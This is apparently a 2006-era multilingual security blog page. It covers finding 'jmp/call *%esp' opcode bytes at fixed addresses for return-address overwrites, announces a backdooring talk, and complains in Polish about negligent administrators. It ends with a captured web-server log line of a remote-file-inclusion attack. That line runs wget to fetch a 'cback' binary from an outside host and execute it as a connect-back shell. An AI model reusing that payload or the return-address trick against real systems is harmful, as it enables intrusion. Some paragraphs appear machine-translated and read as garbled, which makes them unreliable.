Simplysecurity

Did any one think about hardcore values ?

"The basic data unit in computers is bits, and every 8 bits are converted to a byte. In the process, the actual bits never change, but rather the logical meaning. For instance, the difference between a signed and unsigned is up to the program to recognize the MSB as sign bit nor data bit. As there is no absolute way to define a group of bits, different interpretation becomes possible." - from smashthestack paper,
There was only one interpratation of hardcore value number 58623, as a ret addr using its value jmp *%ESP.

58623 translates into FFE4 and that means JMP *%ESP

But I found a second one, that gives more possibilities when playing with the process. 54527 translates into FFD4 and that means CALL *%ESP.
(gdb) x/1i main+22
0x80483ba : call *%esp

0x80483ba will not change durring next debug(next run), why? 2.6 kernel doesn't randomise this sector. Why? Google more,
I will publish a project about this value in few days.

Hauptthema backdooring. Ich veröffentlichte eine neue backdooring Methode, die backdooring Nonp2p genannt wurde. Ich füge Projekt dem blaass.net Aufstellungsort an den Tagen hinzu. Bis dann besuchen Sie:

I was lecturing on a security conference in Krakau-PL. Topic touched: backdooring & hacking. I published a new techique called Nonp2p backdooring. I will add description shortly. Till then, visit:

La matière principale backdooring. J'ai édité une nouvelle méthode backdooring appelée Nonp2p backdooring. J'ajouterai le projet à l'emplacement de blaass.net des jours. Jusqu'à puis visitez :


security.proidea.org.pl

Najnowsze wyniki badań (opublikowane przez FBI) - udowadniają tezę, którą poruszałem już nie raz. Administratorzy, informatycy, specjaliści odpowiedzialni za bezpieczeństwo w swojej firmie ignorują wszelkie normy. Nastały czasy w których dostajemy podwyżki dlatego, że niebezpieczeństwo - pseudo zagrożenie - jest większe niż kilka lat temu. Przy tym zapomnieliśmy, że to my jesteśmy odpowiedzialni za bezpieczeństwo informacji, bezpieczeństwo danych i że to my jesteśmy ostatnią linią obrony - a nie robimy nic i zawodzimy.
Jestem przeciwnikiem standardyzacji, dlatego zwracam się do was z prośbą: reagujcie, badajcie, myślcie analitycznie (ref. BS-7799).

ps. Kiedy 'dzieci' przestaną używać google do 'hack'-owania?


139.223.200.125 - - [05/May/2006:03:18:25 +0200] "GET /cvs/index.php?_REQUEST[option]=com_content&_
REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://190.48.107.56/cmd.gif?&cmd=cd%20/tmp;wget%2082.165.30.74/
cback;chmod%20744%20cback;./cback%20195.184.201.82%208080;echo%20YYY;echo| HTTP/1.1" 404 -